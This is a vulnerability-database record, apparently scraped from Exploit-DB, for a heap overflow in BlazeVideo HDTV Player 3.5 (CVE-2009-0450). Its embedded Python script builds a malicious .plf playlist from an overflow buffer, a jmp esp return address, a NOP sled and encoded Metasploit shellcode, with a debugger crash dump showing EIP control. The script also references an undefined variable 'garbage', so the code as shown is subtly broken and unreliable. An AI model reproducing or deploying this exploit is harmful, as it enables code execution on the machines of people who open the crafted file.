{"id": "EDB-ID:7975", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow", "description": "", "published": "2009-02-04T00:00:00", "modified": "2009-02-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/7975", "reporter": "LiquidWorm", "references": [], "cvelist": ["2009-0450"], "immutableFields": [], "lastseen": "2022-08-16T05:07:12", "viewCount": 16, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-0450"]}, {"type": "openvas", "idList": ["OPENVAS:15940"]}]}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "713c59b4375c70aa06e6f91b22aaf01d"}, "sourceHref": "https://www.exploit-db.com/download/7975", "sourceData": "#!/usr/bin/python\r\n#\r\n# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit\r\n#\r\n# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV\r\n# Player software, combining HDTV playback, FM receiving, video record and DVD playback\r\n# functions. You can make advantage of PC monitor's high resolution, watch, record, playback\r\n# high definition HDTV program or teletext broadcast program.\r\n#\r\n# Product web page: http://www.blazevideo.com/hdtv-player/index.htm\r\n#\r\n# Tested on Microsoft Windows XP Professional SP2 (English)\r\n#\r\n# ------------------------------------windbg------------------------------------\r\n#\r\n# (620.d74): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001\r\n# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216\r\n# 43434343 ?? ???\r\n#\r\n#--------------------------------------------------------------------------------\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n#\r\n# liquidworm [t00t] gmail [w00t] com\r\n#\r\n# http://www.zeroscience.org/\r\n#\r\n# 03.01.2009\r\n#\r\n\r\n\r\nprint \"--------------------------------------------------------------------------\"\r\nprint \" BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\\n\"\r\nprint \"\\t\\t\\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\\n\"\r\nprint \"--------------------------------------------------------------------------\"\r\n\r\nbuffer = \"\\x41\" * 260\r\n\r\neip = \"\\xc0\\x25\\x49\\x7e\" #jmp esp user32.dll\r\n\r\nnop = \"\\x90\" * 15\r\n\r\n# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com\r\nshellcode = (\r\n\t\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\t\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x48\\x6a\\x65\"\r\n\t\"\\x58\\x30\\x42\\x31\\x50\\x42\\x41\\x6b\\x41\\x41\\x75\\x32\\x41\\x42\\x32\\x42\"\r\n\t\"\\x41\\x30\\x42\\x41\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x39\\x79\\x6b\\x4c\\x4a\"\r\n\t\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x57\\x70\\x4c\\x4b\\x71\\x55\\x77\\x4c\\x4c\"\r\n\t\"\\x4b\\x71\\x6c\\x37\\x75\\x30\\x78\\x75\\x51\\x78\\x6f\\x4c\\x4b\\x52\\x6f\\x32\"\r\n\t\"\\x38\\x4c\\x4b\\x63\\x6f\\x45\\x70\\x55\\x51\\x5a\\x4b\\x31\\x59\\x6c\\x4b\\x44\"\r\n\t\"\\x74\\x6c\\x4b\\x55\\x51\\x4a\\x4e\\x76\\x51\\x49\\x50\\x6d\\x49\\x4c\\x6c\\x4e\"\r\n\t\"\\x64\\x6f\\x30\\x30\\x74\\x43\\x37\\x7a\\x61\\x59\\x5a\\x36\\x6d\\x46\\x61\\x6a\"\r\n\t\"\\x62\\x58\\x6b\\x7a\\x54\\x45\\x6b\\x76\\x34\\x47\\x54\\x64\\x44\\x53\\x45\\x79\"\r\n\t\"\\x75\\x4c\\x4b\\x63\\x6f\\x51\\x34\\x67\\x71\\x4a\\x4b\\x50\\x66\\x4c\\x4b\\x76\"\r\n\t\"\\x6c\\x30\\x4b\\x4c\\x4b\\x43\\x6f\\x67\\x6c\\x34\\x41\\x58\\x6b\\x6e\\x6b\\x75\"\r\n\t\"\\x4c\\x6c\\x4b\\x37\\x71\\x38\\x6b\\x6c\\x49\\x63\\x6c\\x54\\x64\\x44\\x44\\x79\"\r\n\t\"\\x53\\x50\\x31\\x69\\x50\\x63\\x54\\x4c\\x4b\\x63\\x70\\x34\\x70\\x4b\\x35\\x4f\"\r\n\t\"\\x30\\x53\\x48\\x56\\x6c\\x6e\\x6b\\x71\\x50\\x76\\x6c\\x4c\\x4b\\x34\\x30\\x45\"\r\n\t\"\\x4c\\x4c\\x6d\\x4e\\x6b\\x50\\x68\\x55\\x58\\x5a\\x4b\\x54\\x49\\x4c\\x4b\\x6f\"\r\n\t\"\\x70\\x4e\\x50\\x55\\x50\\x63\\x30\\x75\\x50\\x4c\\x4b\\x72\\x48\\x55\\x6c\\x71\"\r\n\t\"\\x4f\\x45\\x61\\x39\\x66\\x41\\x70\\x72\\x76\\x4f\\x79\\x6b\\x48\\x4d\\x53\\x4f\"\r\n\t\"\\x30\\x73\\x4b\\x50\\x50\\x50\\x68\\x6a\\x4f\\x48\\x4e\\x6d\\x30\\x43\\x50\\x62\"\r\n\t\"\\x48\\x6f\\x68\\x4b\\x4e\\x4f\\x7a\\x74\\x4e\\x46\\x37\\x39\\x6f\\x69\\x77\\x41\"\r\n\t\"\\x63\\x50\\x6f\\x70\\x6c\\x75\\x50\\x65\"\r\n\t)\r\n\r\npayload = garbage + eip + nop + shellcode + nop\r\n\r\ntry:\r\n\tout_file = open(\"Groundhog_Day.plf\",'w')\r\n\tout_file.write(payload)\r\n\tout_file.close()\r\n\traw_input(\"\\n\\n[*] Evil playlist successfully created.\\n\\nPress any key to continue...\")\r\nexcept:\r\n\tprint \"Oops!\"\r\n\r\n# milw0rm.com [2009-02-04]", "osvdbidlist": ["51825"], "exploitType": "local", "verified": true}
{}
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow